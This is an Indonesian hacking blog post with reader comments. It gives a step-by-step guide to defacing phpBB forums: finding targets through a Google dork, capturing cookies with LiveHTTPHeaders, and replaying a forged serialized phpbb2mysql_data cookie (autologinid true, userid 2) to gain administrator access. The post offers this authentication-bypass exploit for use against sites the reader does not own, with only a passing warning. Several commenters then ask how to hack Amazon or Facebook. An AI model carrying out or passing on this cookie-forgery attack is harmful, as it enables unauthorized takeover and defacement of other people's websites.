Deface (Ambil alih) sebuah Website sederhana...WOW ! ! ! | Rasakan

Deface (Ambil alih) sebuah Website sederhana...WOW ! ! !

Helloooooooo sobat hacking mania....^_^
dari kemaren bingung mau posting apa'n...he mumpung lagi terkena angin jahat mending q share dah cara deface atau ambil alih website..huuu kayaknya seru neh..he
sebelumnya q jelasin dlu ap sich deface itu ????
Deface atau defacing adalah kegiatan mengambil alih atau mengubah isi index dari sebuah website untuk hal yang menyenangkan maupun hal yang merugikan. Tetapi orang2 udah terlanjur menganggap deface dengan pandangan negatif. Kegiatan ini dapat merugikan orang lain, so jangan buat main2 atau ngejailin orang yau...

Langkah-Langkah Deface :
1. Download browser Mozilla FireFox

2. Download pluginnya yg bernama LiveHTTPHeader
download di http://livehttpheaders.mozdev.org/installation.html
cari yg paling baru

3. selanjutnya cari target dengan Mbah Google dgn syntax :
phpBB site:[terserah apa aja]

4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader

5. Ingat, isi LiveHTTPHeader harus kosong

6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target

7. setelah halaman sukses terbuka ditandai dengan tanda “done” di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..

8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay…

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

9. Hapus bagian yg belakang setelah tanda semi colon (

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

\_______________hapus bagian ini_________________/

jadinya akan seperti ini :

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D

10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi

11. selanjutnya perhatikan langkah di bawah ini:

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
\________hapus bagian ini dan di ganti dengan:

Cookie: phpbb2mysql_data=a:2{s:11:”autologinid”;s:32:”602baahpepms74d4cb6f2d012e1e4019″;s:6:”userid”;s:1:”2″;}

12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

13. perhatikan lagi langkah ini:

Cookie: phpbb2mysql_data=a:2:{s:11:”autologinid”;s:32:”602baahpepms74d4cb6f2d012e1e4019″;s:6:”userid”;s:1:”2″;}
\___________________________bagian ini jg digantilagi_______________________________/

menjadi seperti ini:

Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

15. selesai, silakan liat halaman target, kalo anda beruntung qm mendapatkan full admin.
Silakan pergi ke bawah halaman dan lihat opsi “Go To Administration Panel” telah muncul.

Dapet dari tetangga sebelah ney, hohoho... jangan buat maenan yau..ok..???

Moga ja bermanfaat..hehe Salam Hacking By : Abiey ^_^

Subscribe to receive free email updates:

15 Responses to "Deface (Ambil alih) sebuah Website sederhana...WOW ! ! !"

  1. Kayak pesulap yang ngasih tau triknya aja,,boleh juga ni..hehee. . .
    Thx. . .

    BalasHapus
  2. @ladida cafe sm2

    @ b4yan6an wkwkwkwk..magician in technology...

    @bayuPiVoT silahkan...dicoba gan..ntar q update kalo gagal

    @PUTR4 wkwk msh sereman muke gue..he

    BalasHapus
  3. mau hack situs amazone.com ndak iso toh kang mas

    BalasHapus
  4. hack fb bgmna tah?

    BalasHapus
  5. itu ketik di google mas..buat cari situs target

    BalasHapus
  6. gan tolong dong no 3-5 masih bingung

    BalasHapus
    Balasan
    1. no 3 itu namanya google dork gan dan 4-5 agan download dulu plugin nya,,tp kayaknya cara ini udah gak bisa lagi gan

      Hapus
  7. do not use for criminals

    BalasHapus

Silahkan Sobat berkomentar sebanyak-banyaknya dengan syarat :
1. Berkomentar sesuai dengan tema artikel
2. Jangan berkomentar SARA dan Porno
3. Jangan berkomentar menggunakan LINK AKTIF
Berkomentarlah dengan sopan karena komentar sobat tidak akan di moderasi.